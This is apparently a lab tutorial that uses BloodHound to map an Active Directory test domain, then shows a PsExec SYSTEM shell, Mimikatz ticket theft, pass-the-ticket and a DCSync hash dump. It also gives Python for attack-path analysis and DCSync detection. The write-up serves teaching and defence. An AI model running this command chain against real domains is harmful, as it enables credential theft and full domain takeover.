BloodHound by Example

BloodHound (https://github.com/BloodHoundAD/BloodHound) provides an effective way to map Active Directory networks and analyse the collected information for potential attack paths. In this scenario we walk through a practical example of how the tool can be used to find and exploit trust relationships in a small domain environment.

To begin with, we run SharpHound, the BloodHound data collector, on the system CLIENT1 under the ALICE user account. No special privileges are required for this:

[Screenshot: SharpHound.exe run from C:\Toolkit on CLIENT1. Output: Initializing BloodHound at 4:45 AM on 2/10/2019; Resolved Collection Methods to Group, LocalGroup, Session, Trusts; Starting Enumeration for bgtest.local; Status: 48 objects enumerated (Using 23 MB RAM); Finished enumeration for bgtest.local; Compressing data; You can upload this file directly to the UI; Finished compressing files!]

SharpHound collects two key pieces of information: Active Directory accounts and their group memberships, and which accounts are currently logged on to which systems.

The tool exports its output to a Zip file. This can then be imported into the BloodHound graphical interface:

[Screenshot of the BloodHound graph after importing the data. Nodes: ALICE@BGTEST.LOCAL, SUPPORT@BGTEST.LOCAL, ITSUPPORT@BGTEST.LOCAL, CLIENT2.BGTEST.LOCAL, BOB@BGTEST.LOCAL, DOMAIN ADMINS@BGTEST.LOCAL, ADMINISTRATORS@BGTEST.LOCAL, ADMINISTRATOR@BGTEST.LOCAL, ENTERPRISE ADMINS@BGTEST.LOCAL, GROUP POLICY CREATOR OWNERS@BGTEST.LOCAL, DOMAIN CONTROLLERS@BGTEST.LOCAL, WIN-S16N6K2RCAE.BGTEST.LOCAL. Edge labels visible include MemberOf and AdminTo.]

From this diagram, we can see a fairly clear attack path. ALICE is a member of the SUPPORT group, which in turn is a member of ITSUPPORT, and ITSUPPORT has local administrator rights on CLIENT2 (the AdminTo edge), which gives us access to that system. User BOB, a member of the DOMAIN ADMINS group, currently has a logon session on this host.
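The path-finding that BloodHound performs on this graph is a plain breadth-first search over typed edges. The following is an added example (not code from the original post or from the BloodHound project) that rebuilds the relationships shown in the diagram as a constructed edge list and answers the two questions a defender asks of such data: what is the shortest path from a given user to DOMAIN ADMINS, and which users have any path there at all. Node and edge names follow BloodHound's conventions (MemberOf, AdminTo, HasSession); the HasSession edge from CLIENT2 to BOB is assumed from the text, since its label is not legible in the screenshot.

```python
from collections import deque

# Constructed sample of BloodHound-style nodes, reproducing the graph above.
# This is not real SharpHound output.
NODES = {
    "ALICE@BGTEST.LOCAL": "User",
    "BOB@BGTEST.LOCAL": "User",
    "ADMINISTRATOR@BGTEST.LOCAL": "User",
    "SUPPORT@BGTEST.LOCAL": "Group",
    "ITSUPPORT@BGTEST.LOCAL": "Group",
    "DOMAIN ADMINS@BGTEST.LOCAL": "Group",
    "ADMINISTRATORS@BGTEST.LOCAL": "Group",
    "ENTERPRISE ADMINS@BGTEST.LOCAL": "Group",
    "GROUP POLICY CREATOR OWNERS@BGTEST.LOCAL": "Group",
    "DOMAIN CONTROLLERS@BGTEST.LOCAL": "Group",
    "CLIENT2.BGTEST.LOCAL": "Computer",
    "WIN-S16N6K2RCAE.BGTEST.LOCAL": "Computer",
}

# (source, relationship, target) in BloodHound's edge direction:
# MemberOf: principal -> group; AdminTo: principal -> computer it administers;
# HasSession: computer -> user whose logon session is present on it.
EDGES = [
    ("ALICE@BGTEST.LOCAL", "MemberOf", "SUPPORT@BGTEST.LOCAL"),
    ("SUPPORT@BGTEST.LOCAL", "MemberOf", "ITSUPPORT@BGTEST.LOCAL"),
    ("ITSUPPORT@BGTEST.LOCAL", "AdminTo", "CLIENT2.BGTEST.LOCAL"),
    ("CLIENT2.BGTEST.LOCAL", "HasSession", "BOB@BGTEST.LOCAL"),  # assumed from the text
    ("BOB@BGTEST.LOCAL", "MemberOf", "DOMAIN ADMINS@BGTEST.LOCAL"),
    ("DOMAIN ADMINS@BGTEST.LOCAL", "MemberOf", "ADMINISTRATORS@BGTEST.LOCAL"),
    ("ADMINISTRATOR@BGTEST.LOCAL", "MemberOf", "DOMAIN ADMINS@BGTEST.LOCAL"),
    ("ADMINISTRATOR@BGTEST.LOCAL", "MemberOf", "ENTERPRISE ADMINS@BGTEST.LOCAL"),
    ("ADMINISTRATOR@BGTEST.LOCAL", "MemberOf", "GROUP POLICY CREATOR OWNERS@BGTEST.LOCAL"),
    ("WIN-S16N6K2RCAE.BGTEST.LOCAL", "MemberOf", "DOMAIN CONTROLLERS@BGTEST.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour), ...]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, target):
    """BFS over directed edges. Returns the hops as a list of
    (source, relationship, target) tuples, or None if unreachable."""
    if start == target:
        return []
    parents = {start: None}           # node -> (previous node, relationship)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for rel, nxt in graph.get(node, []):
            if nxt in parents:
                continue
            parents[nxt] = (node, rel)
            if nxt == target:
                hops, cur = [], nxt
                while parents[cur] is not None:
                    prev, r = parents[cur]
                    hops.append((prev, r, cur))
                    cur = prev
                return hops[::-1]
            queue.append(nxt)
    return None


def principals_reaching(graph, nodes, target, kind="User"):
    """Every node of the given type that has some path to `target`.
    This is the defender's view: who, transitively, reaches Domain Admins."""
    return sorted(
        name for name, node_type in nodes.items()
        if node_type == kind and name != target
        and shortest_path(graph, name, target) is not None
    )


def format_path(hops):
    """Render hops as 'A -[MemberOf]-> B -[AdminTo]-> C'."""
    if not hops:
        return ""
    out = hops[0][0]
    for _, rel, dst in hops:
        out += f" -[{rel}]-> {dst}"
    return out


GRAPH = build_graph(EDGES)

if __name__ == "__main__":
    target = "DOMAIN ADMINS@BGTEST.LOCAL"
    print(format_path(shortest_path(GRAPH, "ALICE@BGTEST.LOCAL", target)))
    print("Users with a path to Domain Admins:",
          principals_reaching(GRAPH, NODES, target))
```

Run as a script, it prints ALICE's five-hop path to DOMAIN ADMINS and the three users that can reach the group. On a real data set the interesting output is the second list: any user on it who is not an intended administrator represents a group nesting, local admin assignment or privileged session that should be removed.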

To exploit this attack path, from the CLIENT1 system where we ran SharpHound we can use PsExec to connect to the CLIENT2 system as the SYSTEM account. This works because ALICE, through SUPPORT and ITSUPPORT, is a member of the local Administrators group on CLIENT2:

[Screenshot: PsExec v2.2 (Sysinternals, Mark Russinovich) run from C:\Toolkit with the -s cmd.exe option to start a SYSTEM shell on CLIENT2. The remote prompt reports Microsoft Windows [Version 6...], and whoami returns nt authority\system.]

We can then run Mimikatz on the host to export the Kerberos tickets cached in memory, including those belonging to the BOB account:

[Screenshot: mimikatz sekurlsa::tickets /export. Three logon sessions are listed: two Network logons for alice (Authentication Id 0;193480 (00000000:0002f3c8) and 0;176349 (00000000:0002b0dd), domain BGTEST, Logon Server (null), Logon Time 2/10/2019) and one Interactive logon for bob (Authentication Id 0;81713 (00000000:00013f31), domain BGTEST.LOCAL, Logon Server WIN-S16N6K2RCRE, Logon Time 2/10/2019). Each session lists its Ticket Granting Service and Ticket Granting Ticket entries, which are exported to files.]

With the ticket written to a file, we can then import it into the current session (pass-the-ticket) to assume the BOB account's identity:

[Screenshot: mimikatz 2.1.1 (x86), build 17763 of Dec 9 2018, "A La Vie, A L'Amour" (Benjamin DELPY 'gentilkiwi', with Vincent LE TOUX), run from C:\. privilege::debug returns Privilege '20' OK; kerberos::ptt is given the exported [0;13f31] ticket file for bob, then mimikatz is exited. A subsequent klist shows Current LogonId 0:0x3e7 with Cached Tickets: (1): Client bob @ BGTEST.LOCAL, Server krbtgt/BGTEST.LOCAL @ BGTEST.LOCAL, KerbTicket Encryption Type RSADSI RC4-HMAC(NT), Ticket Flags 0x40e00000 (forwardable renewable initial pre_authent), Start Time and End Time 2/10/2019, Renew Time 2/17/2019, Session Key Type RSADSI RC4-HMAC(NT).]

Since BOB is a member of the "DOMAIN ADMINS" group and as such has the "Replicate Directory Changes All" permission, we can then execute a DCSync, asking the domain controller to replicate account secrets to us, to extract password hashes from the domain controller:
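Because a DCSync is nothing more than a legitimate replication request made by an account that should not be replicating, it is also one of the easier steps in this chain to detect. With "Audit Directory Service Access" enabled, each replication request produces a Windows security event 4662 whose Properties field names the control-access rights exercised. The added example below (not code from the original post) runs that check over a constructed, simplified event list: it flags any 4662 event where a replication right was used by an account that is not a known domain controller. The three right GUIDs are the real Active Directory values; the event field layout, sample accounts and the domain_controllers allow-list are assumptions for the example.

```python
import re

# Control-access right GUIDs that a DCSync exercises. These are the real AD
# values; event 4662 reports them inside its Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12})\}?")

# Constructed sample events in a simplified field layout (not a real log export).
# The first is the DC replicating normally; the second mirrors the scenario on
# this page; the third touches an unrelated property; the fourth is not a 4662.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "BGTEST", "SubjectUserName": "WIN-S16N6K2RCAE$",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "BGTEST", "SubjectUserName": "bob",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "BGTEST", "SubjectUserName": "alice",
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID
    {"EventID": 4624, "SubjectDomainName": "BGTEST", "SubjectUserName": "alice",
     "Properties": ""},
]


def replication_rights_in(properties):
    """Names of the replication rights listed in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, domain_controllers):
    """Return (DOMAIN\\account, [rights]) for every 4662 event in which an
    account that is not an allow-listed DC machine account exercised a
    replication right. DCs replicate with each other all day, so they are
    excluded by name; everything else is a finding."""
    allowed = {dc.upper() for dc in domain_controllers}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if user.upper() in allowed:
            continue
        findings.append((f"{ev['SubjectDomainName']}\\{user}", rights))
    return findings


if __name__ == "__main__":
    # Assumed allow-list: the DC machine account from the graph above.
    for account, rights in find_dcsync(SAMPLE_EVENTS, ["WIN-S16N6K2RCAE$"]):
        print(f"Possible DCSync by {account}: {', '.join(rights)}")
```

In a real environment the allow-list also has to cover any non-DC service accounts that legitimately replicate, such as directory synchronisation services, otherwise the rule is noisy enough to be switched off. The more durable fix is the one BloodHound points at: find who holds the replication rights on the domain object and who can reach those principals, and cut the paths.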

[Screenshot: mimikatz lsadump::dcsync /domain:bgtest.local /user:bob. Output: [DC] 'bgtest.local' will be the domain; [DC] 'WIN-S16N6K2RCRE.bgtest.local' will be the DC server; [DC] 'bob' will be the user account. Object RDN: bob; SAM Username: bob; User Principal Name: bob@bgtest.local; Account Type: 30000000 (USER_OBJECT); User Account Control: 00000200 (NORMAL_ACCOUNT); Password last change: 2/10/2019; Object Relative ID: 1105. Credentials: the account's NTLM hash, followed by supplemental credentials (Primary:Kerberos-Newer-Keys, Default Salt BGTEST.LOCALbob, Default Iterations 4096, with aes256_hmac, aes128_hmac, des_cbc_md5 and rc4_plain keys, each at 4096 iterations).]